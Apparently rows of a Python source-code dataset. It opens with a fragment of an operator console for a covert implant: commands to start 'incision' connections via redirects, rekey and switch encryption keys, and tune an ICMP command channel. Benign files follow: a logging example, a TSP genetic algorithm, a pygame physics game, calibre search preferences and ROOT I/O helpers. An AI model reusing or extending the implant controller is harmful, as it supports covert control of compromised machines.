##########################################################################
# INCISION class
# op code: 0x14
##########################################################################
class ECHOCMD_INCISION(ECHOCMD):
def __init__(self):
ECHOCMD.__init__(self)
self.name = "incision"
self.usage = "incision <ip>:<port>"
self.info = "Start an incision connection to the specified ip and port"
self.op = 0x14L
def parseHostInfo(self,host):
#split the ip from the ports
res = string.split(host,":")
if len(res) == 1:
raise ValueError, host
elif len(res) == 2:
ports = string.split(res[1],"/")
if len(ports) < 1 or len(ports) > 2:
raise ValueError, ports
if ports[0] == "*":
raise ValueError, ports[0]
else:
ports[0] = eval(ports[0])
try:
host = None
ipaddr = self.ConvertIP(res[0])
except:
host = base.sessionDict[res[0]]
ipaddr = self.ConvertIP(host.target.GetIP())
return host,ipaddr,ports[0]
else:
raise ValueError, host
def run(self,ipport):
msg = ECHOCMD.run(self)
if msg != None:
return (0,msg)
host,ip,port = self.parseHostInfo(ipport)
if host != None:
hpn = host.implant.parent.name
myname = host.name
cmd = host.GetCommand('rediradd')
res = cmd.run("tcp",\
"%s:%d/%d"%(hpn,port,0),\
"%s:%d/%d"%(self.implant.session.target.ip,0,port),\
"-afix")
if cmd.implant.session.target.hasAnotherAddress == 1:
ip = cmd.redir.ST_ip
# Change the ip to a decimal number
self.data = ip + struct.pack("!L",port)
self.Query()
# Look at the response
if (self.op == 0x14L and self.res == 0x1L):
return (1,"Incision contacted successfully")
else:
if( struct.unpack("!L",self.data[0:4])[0] == 0x0106 ):
return (0,"Incision command not supported")
elif( struct.unpack("!L", self.data[0:4])[0] == 0x0107 ):
return (0,"Incision not installed")
else:
return (0,"Incision command failed")
##########################################################################
# DONE class
# op code: 0xFF
##########################################################################
class ECHOCMD_DONE(ECHOCMD):
def __init__(self):
ECHOCMD.__init__(self)
self.name = "done"
self.usage = "done [<num> | all]"
self.info = "Send a DONE message to reset the connection"
self.op = 0xFFL
def run(self,all=None):
msg = ECHOCMD.run(self)
if self.implant.protocol.sock == None:
base.sessionDict[self.implant.session.name] = None
return (1,"all done with " + self.implant.session.name)
rules = self.implant.rules
while len(rules):
i = len(self.implant.rules) - 1
rules[i].remove()
if all != None:
if type(all) != type(1):
all = string.upper(all)
if all[0:1] == "A":
all = 0
else:
all = 0xFFFFFFFFL
else:
all = 0xFFFFFFFFL
self.data = struct.pack("!L",all)
self.Query()
if self.op == 0xFFL and self.res == 0x01L:
myNum = struct.unpack("!L",self.data[0:4])[0]
else:
myNum = 0
if all == 0 or all == myNum or all == 0xFFFFFFFFL:
self.implant.protocol.sock.close()
self.implant.protocol.sock = None
base.sessionDict[self.implant.session.name] = None
if self.implant.version >= 2.0:
if self.implant.session.localRedir != None:
self.implant.session.localRedir.remove()
if myNum == 0:
return (0,"DONE command failed")
return (1,"DONE command completed successfully")
##########################################################################
# SWITCHKEY class
# op code: 0x16
##########################################################################
class ECHOCMD_SWITCHKEY(ECHOCMD):
def __init__(self):
ECHOCMD.__init__(self)
self.name = "switchkey"
self.usage = "switchkey"
self.info = "Tells the implant to switch keys"
self.op = 0x16L
def run(self):
msg = ECHOCMD.run(self)
if msg != None:
return (0,msg)
newCV = self.implant.newCV
self.Query()
if self.op == 0x16L and self.res == 0x01L:
# Change keys
if newCV != None:
self.implant.cipher.SetKey((struct.unpack("!L",newCV[0:4])[0],\
struct.unpack("!L",newCV[4:8])[0],\
struct.unpack("!L",newCV[8:12])[0],
struct.unpack("!L",newCV[12:16])[0]))
self.implant.newCV = None
else:
self.implant.cipher.SetKey(self.implant.targetopts['KEY'])
key = self.implant.cipher.GetKey()
# Check for RC6
if self.implant.cipher.num == 2:
return (1,"SWITCHKEY command completed successfully\nCurrent key is: %s %s %s %s" % (hex.str(key[0]),hex.str(key[1]),hex.str(key[2]),hex.str(key[3])))
else:
return (1,"SWITCHKEY command completed successfully\nCurrent key is: %s %s %s" % (hex.str(key[0]),hex.str(key[1]),hex.str(key[2])))
else:
return (0,"SWITCHKEY command not received")
##########################################################################
# REKEY class
# op code: 0x17
##########################################################################
class ECHOCMD_REKEY(ECHOCMD):
def __init__(self):
ECHOCMD.__init__(self)
self.name = "rekey"
self.usage = "rekey"
self.info = "Initiates a new session key exchange with the implant"
self.op = 0x17L
def run(self):
msg = ECHOCMD.run(self)
if msg != None:
return (0,msg)
myRand = ''
N = self.implant.N
d = self.implant.d
Nsign = self.implant.Nsign
dsign = self.implant.dsign
highofN = N >> 992
# Get the random data
for i in range(4):
myRand = myRand + crypto.GetRandom()
myRand = myRand[0:108]
# Make sure the data isn't going to be bigger than N
highofRand = struct.unpack("!L",myRand[104:108])[0]
if highofRand >= highofN:
myRand = myRand[0:104] + struct.pack("!L",highofRand - highofN)
# Compute a hash of the random data
myHash = sha.new(myRand)
myHash = myHash.digest()
#print "hash s:" + \
# " " + hex.str(struct.unpack("!L",myHash[0:4])[0]) +\
# " " + hex.str(struct.unpack("!L",myHash[4:8])[0]) +\
# " " + hex.str(struct.unpack("!L",myHash[8:12])[0]) +\
# " " + hex.str(struct.unpack("!L",myHash[12:16])[0]) +\
# " " + hex.str(struct.unpack("!L",myHash[16:20])[0])
# Convert the hash and data into a MP number
keyData = myHash + myRand
num = 0L
for i in range(32):
num = (num << 32) | struct.unpack("!L",keyData[124-i*4:128-i*4])[0]
#print "orig (switched) =", hex.str(num)
# RSA
ct = pow(num,dsign,Nsign)
# Package the new MP number
ct2 = 0L
for i in range(32):
ct2 = ct2 << 32 | (ct >> 32*i) & 0xffffffffL
#print "CT =",hex.str(ct)
#print "CT (switched) =",hex.str(ct2)
self.data = ''
for i in range(32):
self.data = struct.pack("!L", ((ct2>>i*32) & 0xffffffffL)) + self.data
self.data = '\000\000\000\000' + self.data
# Send it
self.Query()
self.ret = struct.unpack("!L",self.data[0:4])[0]
if self.op == 0x17L and self.res == 0x01L:
self.data = self.data[4:]
# Unwrap the number
num = 0L
for i in range(32):
num = (num << 32) + \
struct.unpack("!L",self.data[124-i*4:128-i*4])[0]
# RSA
pt = pow(num,d,N)
# Convert the number into the random bits
for i in range(32):
keyData = keyData + \
struct.pack("!L",((pt >> 32*i)&0xffffffffL))
#out = ''
#for i in range(len(keyData)):
# out = out + "%02x" % \
# ((struct.unpack("!H", '\000' + keyData[i:i+1])[0]) &\
# 0xff)
#print "Raw output =",out
# Form CV
newCV = sha.new(keyData)
self.implant.newCV = newCV.digest()
#out = ''
#for i in range(len(self.implant.newCV)):
# out = out + "%02x" % \
# ((struct.unpack("!H", '\000' + self.implant.newCV[i:i+1])[0]) &\
# 0xff)
#print "CV output =",out
return (1,"REKEY command completed successfully, now run switchkey")
elif self.ret == 108:
return (0, "Incorrect authentication")
elif self.ret == 109:
return (0, "Implant not currently on master (original) key")
else:
return (0,"REKEY command failed")
##########################################################################
# ORIGKEY class
##########################################################################
class ECHOCMD_ORIGKEY(ECHOCMD):
def __init__(self):
ECHOCMD.__init__(self)
self.name = "origkey"
self.usage = "origkey"
self.info = "Sets the session key back to the original key"
def run(self):
msg = ECHOCMD.run(self)
if msg != None:
return (0,msg)
self.implant.cipher.SetKey(self.implant.targetopts['KEY'])
return (1,"ORIGKEY command completed successfully")
##########################################################################
# KEY class
##########################################################################
class ECHOCMD_KEY(ECHOCMD):
def __init__(self):
ECHOCMD.__init__(self)
self.name = "key"
self.usage = "key [cv1 cv2 cv3 [cv4]]"
self.info = "Display or set the current key"
def run(self,cv1=0, cv2=0, cv3=0, cv4=0):
msg = ECHOCMD.run(self)
#if msg != None:
# return (0,msg)
if cv1 == 0 and cv2 == 0 and cv3 == 0:
key = self.implant.cipher.GetKey()
else:
key = (cv1,cv2,cv3,cv4)
self.implant.cipher.SetKey(key)
# Display another variable if we're using RC6
if self.implant.cipher.num == 2:
return (1,"Current key is: %s %s %s %s" % \
(hex.str(key[0]), hex.str(key[1]), hex.str(key[2]),
hex.str(key[3])))
else:
return (1,"Current key is: %s %s %s" % \
(hex.str(key[0]), hex.str(key[1]), hex.str(key[2])))
##########################################################################
# RETRY class
#########################################################################
class ECHOCMD_RETRY(ECHOCMD):
def __init__(self):
ECHOCMD.__init__(self)
self.name = "retries"
self.usage = "retries [num]"
self.info = "Get and set the number of retries (see also timeout)"
def run(self, num=-1):
msg = ECHOCMD.run(self)
#if msg != None:
# return (0,msg)
if num > -1:
self.implant.retries = num
return (1,"Set to %d retries" % num)
else:
return (1,"Will try %d times before giving up" % self.implant.retries)
##########################################################################
# SETSIZE class
#########################################################################
class ECHOCMD_SETSIZE(ECHOCMD):
def __init__(self):
ECHOCMD.__init__(self)
self.name = "setsize"
self.usage = "setsize [CC packet size]"
self.info = "Get and set the size of the ICMP packet"
def run(self, size=0):
msg = ECHOCMD.run(self)
#if msg != None:
# return (0,msg)
if size:
self.implant.packetSize = size
return (1,"ICMP packet size is now %d" % size)
else:
return (1,"ICMP packet size is %d" % self.implant.packetSize)
##########################################################################
# TIMEOUT class
#########################################################################
class ECHOCMD_TIMEOUT(ECHOCMD):
def __init__(self):
ECHOCMD.__init__(self)
self.name = "timeout"
self.usage = "timeout [seconds]"
self.info = "Get and set the timeout (in seconds) to wait for a response"
def run(self,sec=0):
msg = ECHOCMD.run(self)
#if msg != None:
# return (0,msg)
if sec:
self.implant.protocol.timeout = sec
return (1,"Timeout set to %d seconds" % sec)
else:
return (1,"The timeout is set to %d seconds" % self.implant.protocol.timeout)
##########################################################################
# TIMEDIFF class
#########################################################################
class ECHOCMD_TIMEDIFF(ECHOCMD):
def __init__(self):
ECHOCMD.__init__(self)
self.name = "timediff"
self.usage = "timediff [[-]seconds]"
self.info = "Get and set time difference (in seconds) between host and target"
def run(self,sec=-999999):
msg = ECHOCMD.run(self)
#if msg != None:
# return (0,msg)
if sec != -999999:
self.implant.timediff = self.ConvertTime(sec)
return (1,"Timediff set to %s" % self.TimeConvert(sec))
else:
return (1,"Timediff is set at %s" % self.TimeConvert(self.implant.timediff))
| unlicense | -3,864,204,355,794,672,000 | 35.035439 | 166 | 0.44157 | false | 3.902386 | false | false | false |
qilicun/python | python2/PyMOTW-1.132/PyMOTW/logging/logging_level_example.py | 1 | 1796 | #!/usr/bin/env python
#
# Copyright 2007 Doug Hellmann.
#
#
# All Rights Reserved
#
# Permission to use, copy, modify, and distribute this software and
# its documentation for any purpose and without fee is hereby
# granted, provided that the above copyright notice appear in all
# copies and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of Doug
# Hellmann not be used in advertising or publicity pertaining to
# distribution of the software without specific, written prior
# permission.
#
# DOUG HELLMANN DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN
# NO EVENT SHALL DOUG HELLMANN BE LIABLE FOR ANY SPECIAL, INDIRECT OR
# CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS
# OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
# CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
"""Simple logging to stderr using different levels.
See http://blog.doughellmann.com/2007/05/pymotw-logging.html
"""
__module_id__ = "$Id$"
#end_pymotw_header
import logging
import sys
LEVELS = { 'debug':logging.DEBUG,
'info':logging.INFO,
'warning':logging.WARNING,
'error':logging.ERROR,
'critical':logging.CRITICAL,
}
if len(sys.argv) > 1:
level_name = sys.argv[1]
level = LEVELS.get(level_name, logging.NOTSET)
logging.basicConfig(level=level)
logging.debug('This is a debug message')
logging.info('This is an info message')
logging.warning('This is a warning message')
logging.error('This is an error message')
logging.critical('This is a critical error message')
| gpl-3.0 | 8,593,154,985,870,459,000 | 32.259259 | 70 | 0.727728 | false | 3.862366 | false | false | false |
crazyskady/ai-game-python | Chapter04/TSP.py | 1 | 7689 | # -*- coding: utf-8 -*-
import random
import math
import copy
import pygame
from pygame.locals import *
from sys import exit
EPSILON = 0.000001
NUM_BEST_TO_ADD = 2
class CoOrd(object):
def __init__(self, a, b):
self._x = a
self._y = b
def X(self):
return self._x
def Y(self):
return self._y
class mapTSP(object):
#mapWidth, mapHeight 是这些城市所在的画布的大小
def __init__(self, mapWidth, mapHeight, numCities):
self._mapWidth = mapWidth
self._mapHeight = mapHeight
self._numCities = numCities
self._BestPossibleRoute = 0
self._CityCoOrds = []
self.CreateCitiesCircular()
self.CalculateBestPossibleRoute()
return
def CreateCitiesCircular(self):
margin = 40 #if you have GUI, this parameter should be set
radius = 0
if self._mapHeight < self._mapWidth:
radius = (self._mapHeight/2) - margin
else:
radius = (self._mapWidth/2) - margin
origin = CoOrd(self._mapWidth/2, self._mapHeight/2)
segmentSize = 2 * math.pi / self._numCities
angle = 0
while angle < (2 * math.pi):
thisCity = CoOrd((radius*math.sin(angle) + origin.X()), (radius * math.cos(angle) + origin.Y()))
self._CityCoOrds.append(thisCity)
angle += segmentSize
return
def CalculateA_to_B(self, city1, city2):
#print city1, city2
xDist = city1.X() - city2.X()
yDist = city1.Y() - city2.Y()
return math.sqrt(xDist*xDist + yDist*yDist)
def CalculateBestPossibleRoute(self):
#print "Enter CalculateBestPossibleRoute"
self._BestPossibleRoute = 0
for idx, city in enumerate(self._CityCoOrds[:-1]):
self._BestPossibleRoute += self.CalculateA_to_B(city, self._CityCoOrds[idx+1])
self._BestPossibleRoute += EPSILON
self._BestPossibleRoute += self.CalculateA_to_B(self._CityCoOrds[-1], self._CityCoOrds[0])
return
def BestPossibleRoute(self):
return self._BestPossibleRoute
def GetTourLength(self, route):
#print "Enter GetTourLength", route
TotalDistance = 0
for idx, city in enumerate(route[:-1]):
TotalDistance += self.CalculateA_to_B(self._CityCoOrds[city], self._CityCoOrds[route[idx+1]])
TotalDistance += self.CalculateA_to_B(self._CityCoOrds[route[-1]], self._CityCoOrds[route[0]])
return TotalDistance
class SGenome(object):
def __init__(self, nc):
self._Fitness = 0
self._Cities = self.GrabPermutation(nc)
return
def GrabPermutation(self, limit):
Perm = []
for i in xrange(limit):
NextPossibleNumber = random.randint(0, limit-1)
while NextPossibleNumber in Perm:
NextPossibleNumber = random.randint(0, limit-1)
Perm.append(NextPossibleNumber)
return Perm
def Show(self):
print self._Cities
class gaTSP(object):
def __init__(self, mutRate, crossRate, popSize, numCities, mapWidth, mapHeight):
self._MutationRate = mutRate
self._CrossoverRate = crossRate
self._PopSize = popSize
self._FittestGenome = 0
self._Generation = 0
self._ShortestRoute = 9999999999
self._LongestRoute = 0
self._ChromoLength = numCities
self._Busy = False
self._TotalFitness = 0.0
self._Population = []
self._Map = mapTSP(mapWidth, mapHeight, numCities)
self.CreateStartingPopulation()
return
def CreateStartingPopulation(self):
self._Population = []
for i in xrange(self._PopSize):
self._Population.append(SGenome(self._ChromoLength))
self._Generation = 0
self._ShortestRoute = 9999999999
self._FittestGenome = 0
self._Busy = False
return
def RouletteWhellSelection(self):
fSlice = random.random() * self._TotalFitness
cfTotal = 0.0
SelectedGenome = 0
for i in xrange(self._PopSize):
cfTotal += self._Population[i]._Fitness
if cfTotal > fSlice:
SelectedGenome = i
break
return self._Population[SelectedGenome]
def MutateEM(self, chromo):
if random.random() > self._MutationRate:
return chromo
pos1 = random.randint(0, len(chromo)-1)
pos2 = pos1
while pos1 == pos2:
pos2 = random.randint(0, len(chromo)-1)
chromo[pos1], chromo[pos2] = chromo[pos2], chromo[pos1]
return chromo
def CrossoverPMX(self, mum, dad):
if random.random() > self._CrossoverRate or mum == dad:
#if random.random() > self._CrossoverRate:
return mum, dad
baby1 = copy.deepcopy(mum)
baby2 = copy.deepcopy(dad)
beg = random.randint(0, len(mum)-2)
end = random.randint(beg+1, len(mum)-1)
for pos in range(beg, end+1):
gene1 = baby1[pos]
gene2 = baby2[pos]
if gene1 != gene2: #每个数字都是应该不重复的
posGene1 = baby1.index(gene1)
posGene2 = baby1.index(gene2)
baby1[posGene1], baby1[posGene2] = baby1[posGene2], baby1[posGene1]
posGene1 = baby2.index(gene1)
posGene2 = baby2.index(gene2)
baby2[posGene1], baby2[posGene2] = baby2[posGene2], baby2[posGene1]
return baby1, baby2
def CalculatePopulationsFitness(self):
for i in xrange(self._PopSize):
TourLength = self._Map.GetTourLength(self._Population[i]._Cities)
self._Population[i]._Fitness = TourLength
if TourLength < self._ShortestRoute:
self._ShortestRoute = TourLength
self._FittestGenome = i
if TourLength > self._LongestRoute:
self._LongestRoute = TourLength
for i in xrange(self._PopSize):
self._Population[i]._Fitness = self._LongestRoute - self._Population[i]._Fitness
self._TotalFitness += self._Population[i]._Fitness
return
def Reset(self):
self._ShortestRoute = 9999999999
self._LongestRoute = 0
self._TotalFitness = 0
return
def Epoch(self):
self.Reset()
self.CalculatePopulationsFitness()
if self._ShortestRoute <= self._Map.BestPossibleRoute():
self._Busy = False
print "Generation: ", self._Generation, " Find Path: ", self._Population[self._FittestGenome]._Cities
return
NewPop = []
for i in xrange(NUM_BEST_TO_ADD):
NewPop.append(copy.deepcopy(self._Population[self._FittestGenome]))
while len(NewPop) < self._PopSize:
mum = self.RouletteWhellSelection()
dad = self.RouletteWhellSelection()
baby1 = SGenome(0)
baby2 = SGenome(0)
baby1._Cities, baby2._Cities = self.CrossoverPMX(mum._Cities, dad._Cities)
baby1._Cities = self.MutateEM(baby1._Cities)
baby2._Cities = self.MutateEM(baby2._Cities)
NewPop.append(baby1)
NewPop.append(baby2)
self._Population = NewPop
self._Generation += 1
return
def Run(self):
self.CreateStartingPopulation()
self._Busy = True
def Started(self):
return self._Busy
def Stop(self):
self._Busy = False
return
if __name__ == "__main__":
WINDOW_WIDTH = 500
WINDOW_HEIGHT = 500
NUM_CITIES = 20
CITY_SIZE = 5
MUTATION_RATE = 0.2
CROSSOVER_RATE = 0.75
POP_SIZE = 40
#Test Code(self, mutRate, crossRate, popSize, numCities, mapWidth, mapHeight):
test_gaTSP = gaTSP(MUTATION_RATE, CROSSOVER_RATE, POP_SIZE, NUM_CITIES, WINDOW_WIDTH, WINDOW_HEIGHT)
test_gaTSP.Run()
pygame.init()
screen = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT), 0, 32)
font = pygame.font.SysFont("arial", 16)
while True:
for event in pygame.event.get():
if event.type == QUIT:
exit()
screen.fill((255, 255, 255))
for idx, item in enumerate(test_gaTSP._Map._CityCoOrds):
pygame.draw.circle(screen,[255,0,0],[int(item._x), int(item._y)],5,0)
if test_gaTSP.Started():
test_gaTSP.Epoch()
drawPoints = []
for idx, item in enumerate(test_gaTSP._Population[test_gaTSP._FittestGenome]._Cities):
cityPos = test_gaTSP._Map._CityCoOrds[item]
drawPoints.append([int(cityPos._x), int(cityPos._y)])
pygame.draw.lines(screen, [0, 255, 0], True, drawPoints, 2)
generatioinStr = "Generation: " + str(test_gaTSP._Generation)
screen.blit(font.render(generatioinStr, True, (0, 0, 255)), (20, 20))
pygame.display.update()
| mit | -2,548,125,952,688,736,000 | 23.641935 | 104 | 0.685954 | false | 2.737012 | true | false | false |
irl/ten-second-balls | universe.py | 1 | 3157 | #
# Ten Second Balls
# Copyright (C) 2013 Iain Learmonth
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
import pygame
from pygame.locals import *
from pygame.color import *
import pymunk
from pymunk.pygame_util import draw_space
class Universe:
def __init__(self, level):
# Initialisation
pygame.init()
self.screen = pygame.display.set_mode((600, 600))
pygame.display.set_caption("Ludum Dare 27 - 10 Seconds - A thing by irl")
self.clock = pygame.time.Clock()
self.won = self.lost = False
# Set up space
self.space = space = pymunk.Space()
space.gravity = (0.0, -900.0)
# Set up walls
space.add(level.get_universe_walls(space))
space.add_collision_handler(2, 3, post_solve=self.activate_bomb)
space.add_collision_handler(1, 2, post_solve=self.win)
# Set up blocks
for block in level.blocks:
x, y = block
self.add_block(x, y)
# Set up finish
x, y = level.finish
self.add_finish(x, y)
def add_block(self, x, y):
inertia = pymunk.moment_for_circle(1, 0, 14, (0,0))
body = pymunk.Body(1, inertia)
shape = pymunk.Circle(body, 14)
body.position = x, y
shape.collision_type = 3
shape.color = THECOLORS['purple']
self.space.add(body, shape)
return shape
def add_finish(self, x, y):
body = pymunk.Body(pymunk.inf, pymunk.inf)
shape = pymunk.Circle(body, 25)
body.position = x, y
shape.collision_type = 1
shape.color = THECOLORS['yellow']
self.space.add(body, shape)
def tick(self):
self.screen.fill(THECOLORS['black'])
draw_space(self.screen, self.space)
self.space.step(1/50.0)
pygame.display.flip()
self.clock.tick(50)
dead_blocks = []
for shape in self.space.shapes:
if shape.collision_type > 5:
shape.collision_type -= 1
if shape.collision_type == 5:
dead_blocks.append(shape)
for shape in dead_blocks:
self.space.remove(shape)
def win(self, space, arbiter):
print "YOU WIN!"
self.won = True
def activate_bomb(self, space, arbiter):
print "Bomb activated"
for shape in arbiter.shapes:
if shape.collision_type == 3:
shape.collision_type = 600
shape.color = THECOLORS['red']
| gpl-2.0 | 5,359,474,104,752,281,000 | 30.57 | 81 | 0.616408 | false | 3.579365 | false | false | false |
CasparLi/calibre | src/calibre/gui2/preferences/search.py | 14 | 10956 | #!/usr/bin/env python2
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
__license__ = 'GPL v3'
__copyright__ = '2010, Kovid Goyal <[email protected]>'
__docformat__ = 'restructuredtext en'
from PyQt5.Qt import QApplication
from calibre.gui2.preferences import ConfigWidgetBase, test_widget, \
CommaSeparatedList
from calibre.gui2.preferences.search_ui import Ui_Form
from calibre.gui2 import config, error_dialog, gprefs
from calibre.utils.config import prefs
from calibre.utils.icu import sort_key
from calibre.library.caches import set_use_primary_find_in_search
class ConfigWidget(ConfigWidgetBase, Ui_Form):
def genesis(self, gui):
self.gui = gui
db = gui.library_view.model().db
self.db = db
r = self.register
r('search_as_you_type', config)
r('highlight_search_matches', config)
r('show_highlight_toggle_button', gprefs)
r('limit_search_columns', prefs)
r('use_primary_find_in_search', prefs)
r('limit_search_columns_to', prefs, setting=CommaSeparatedList)
fl = db.field_metadata.get_search_terms()
self.opt_limit_search_columns_to.update_items_cache(fl)
self.clear_history_button.clicked.connect(self.clear_histories)
self.gst_explanation.setText('<p>' + _(
"<b>Grouped search terms</b> are search names that permit a query to automatically "
"search across more than one column. For example, if you create a grouped "
"search term <code>allseries</code> with the value "
"<code>series, #myseries, #myseries2</code>, then "
"the query <code>allseries:adhoc</code> will find 'adhoc' in any of the "
"columns <code>series</code>, <code>#myseries</code>, and "
"<code>#myseries2</code>.<p> Enter the name of the "
"grouped search term in the drop-down box, enter the list of columns "
"to search in the value box, then push the Save button. "
"<p>Note: Search terms are forced to lower case; <code>MySearch</code> "
"and <code>mysearch</code> are the same term."
"<p>You can have your grouped search term show up as user categories in "
" the Tag Browser. Just add the grouped search term names to the Make user "
"categories from box. You can add multiple terms separated by commas. "
"The new user category will be automatically "
"populated with all the items in the categories included in the grouped "
"search term. <p>Automatic user categories permit you to see easily "
"all the category items that "
"are in the columns contained in the grouped search term. Using the above "
"<code>allseries</code> example, the automatically-generated user category "
"will contain all the series mentioned in <code>series</code>, "
"<code>#myseries</code>, and <code>#myseries2</code>. This "
"can be useful to check for duplicates, to find which column contains "
"a particular item, or to have hierarchical categories (categories "
"that contain categories)."))
self.gst = db.prefs.get('grouped_search_terms', {}).copy()
self.orig_gst_keys = self.gst.keys()
fl = []
for f in db.all_field_keys():
fm = db.metadata_for_field(f)
if not fm['search_terms']:
continue
if not fm['is_category']:
continue
fl.append(f)
self.gst_value.update_items_cache(fl)
self.fill_gst_box(select=None)
self.category_fields = fl
ml = [(_('Match any'), 'match_any'), (_('Match all'), 'match_all')]
r('similar_authors_match_kind', db.prefs, choices=ml)
r('similar_tags_match_kind', db.prefs, choices=ml)
r('similar_series_match_kind', db.prefs, choices=ml)
r('similar_publisher_match_kind', db.prefs, choices=ml)
self.set_similar_fields(initial=True)
self.similar_authors_search_key.currentIndexChanged[int].connect(self.something_changed)
self.similar_tags_search_key.currentIndexChanged[int].connect(self.something_changed)
self.similar_series_search_key.currentIndexChanged[int].connect(self.something_changed)
self.similar_publisher_search_key.currentIndexChanged[int].connect(self.something_changed)
self.gst_delete_button.setEnabled(False)
self.gst_save_button.setEnabled(False)
self.gst_names.currentIndexChanged[int].connect(self.gst_index_changed)
self.gst_names.editTextChanged.connect(self.gst_text_changed)
self.gst_value.textChanged.connect(self.gst_text_changed)
self.gst_save_button.clicked.connect(self.gst_save_clicked)
self.gst_delete_button.clicked.connect(self.gst_delete_clicked)
self.gst_changed = False
if db.prefs.get('grouped_search_make_user_categories', None) is None:
db.new_api.set_pref('grouped_search_make_user_categories', [])
r('grouped_search_make_user_categories', db.prefs, setting=CommaSeparatedList)
self.muc_changed = False
self.opt_grouped_search_make_user_categories.lineEdit().editingFinished.connect(
self.muc_box_changed)
def set_similar_fields(self, initial=False):
self.set_similar('similar_authors_search_key', initial=initial)
self.set_similar('similar_tags_search_key', initial=initial)
self.set_similar('similar_series_search_key', initial=initial)
self.set_similar('similar_publisher_search_key', initial=initial)
def set_similar(self, name, initial=False):
field = getattr(self, name)
if not initial:
val = field.currentText()
else:
val = self.db.prefs[name]
field.blockSignals(True)
field.clear()
choices = []
choices.extend(self.category_fields)
choices.extend(sorted(self.gst.keys(), key=sort_key))
field.addItems(choices)
dex = field.findText(val)
if dex >= 0:
field.setCurrentIndex(dex)
else:
field.setCurrentIndex(0)
field.blockSignals(False)
def something_changed(self, dex):
self.changed_signal.emit()
def muc_box_changed(self):
self.muc_changed = True
def gst_save_clicked(self):
idx = self.gst_names.currentIndex()
name = icu_lower(unicode(self.gst_names.currentText()))
if not name:
return error_dialog(self.gui, _('Grouped Search Terms'),
_('The search term cannot be blank'),
show=True)
if idx != 0:
orig_name = unicode(self.gst_names.itemData(idx) or '')
else:
orig_name = ''
if name != orig_name:
if name in self.db.field_metadata.get_search_terms() and \
name not in self.orig_gst_keys:
return error_dialog(self.gui, _('Grouped Search Terms'),
_('That name is already used for a column or grouped search term'),
show=True)
if name in [icu_lower(p) for p in self.db.prefs.get('user_categories', {})]:
return error_dialog(self.gui, _('Grouped Search Terms'),
_('That name is already used for user category'),
show=True)
val = [v.strip() for v in unicode(self.gst_value.text()).split(',') if v.strip()]
if not val:
return error_dialog(self.gui, _('Grouped Search Terms'),
_('The value box cannot be empty'), show=True)
if orig_name and name != orig_name:
del self.gst[orig_name]
self.gst_changed = True
self.gst[name] = val
self.fill_gst_box(select=name)
self.set_similar_fields(initial=False)
self.changed_signal.emit()
def gst_delete_clicked(self):
if self.gst_names.currentIndex() == 0:
return error_dialog(self.gui, _('Grouped Search Terms'),
_('The empty grouped search term cannot be deleted'), show=True)
name = unicode(self.gst_names.currentText())
if name in self.gst:
del self.gst[name]
self.fill_gst_box(select='')
self.changed_signal.emit()
self.gst_changed = True
self.set_similar_fields(initial=False)
def fill_gst_box(self, select=None):
terms = sorted(self.gst.keys(), key=sort_key)
self.opt_grouped_search_make_user_categories.update_items_cache(terms)
self.gst_names.blockSignals(True)
self.gst_names.clear()
self.gst_names.addItem('', '')
for t in terms:
self.gst_names.addItem(t, t)
self.gst_names.blockSignals(False)
if select is not None:
if select == '':
self.gst_index_changed(0)
elif select in terms:
self.gst_names.setCurrentIndex(self.gst_names.findText(select))
def gst_text_changed(self):
self.gst_delete_button.setEnabled(False)
self.gst_save_button.setEnabled(True)
def gst_index_changed(self, idx):
self.gst_delete_button.setEnabled(idx != 0)
self.gst_save_button.setEnabled(False)
self.gst_value.blockSignals(True)
if idx == 0:
self.gst_value.setText('')
else:
name = unicode(self.gst_names.itemData(idx) or '')
self.gst_value.setText(','.join(self.gst[name]))
self.gst_value.blockSignals(False)
def commit(self):
if self.gst_changed:
self.db.new_api.set_pref('grouped_search_terms', self.gst)
self.db.field_metadata.add_grouped_search_terms(self.gst)
self.db.new_api.set_pref('similar_authors_search_key',
unicode(self.similar_authors_search_key.currentText()))
self.db.new_api.set_pref('similar_tags_search_key',
unicode(self.similar_tags_search_key.currentText()))
self.db.new_api.set_pref('similar_series_search_key',
unicode(self.similar_series_search_key.currentText()))
self.db.new_api.set_pref('similar_publisher_search_key',
unicode(self.similar_publisher_search_key.currentText()))
return ConfigWidgetBase.commit(self)
def refresh_gui(self, gui):
set_use_primary_find_in_search(prefs['use_primary_find_in_search'])
gui.set_highlight_only_button_icon()
if self.muc_changed:
gui.tags_view.recount()
gui.search.search_as_you_type(config['search_as_you_type'])
gui.search.do_search()
def clear_histories(self, *args):
for key, val in config.defaults.iteritems():
if key.endswith('_search_history') and isinstance(val, list):
config[key] = []
self.gui.search.clear_history()
if __name__ == '__main__':
app = QApplication([])
test_widget('Interface', 'Search')
| gpl-3.0 | -4,870,056,115,032,629,000 | 43.901639 | 98 | 0.622855 | false | 3.755914 | true | false | false |
andreadotti/StatTest | ROOTIO.py | 1 | 6085 | """
ROOT interfaces and utilities
"""
from Utils import WrongDataType,Error,logger
_logger=logger().getLogger('Interface')
def stripPathName( aPath ):
"""
Remove file name identifier and trailing / from ROOT
TDirectory path
"""
return aPath.GetPath()[aPath.GetPath().find(":")+1:].rstrip('/')
def readDirectory( tdir ):
"""
Recursively read content of ROOT's TDirectory tdir
and add full pathnames to outputlist
"""
outputlist=[]
from ROOT import TIter
nextkey = TIter( tdir.GetListOfKeys() )
key = nextkey()
while key:
obj = key.ReadObj()
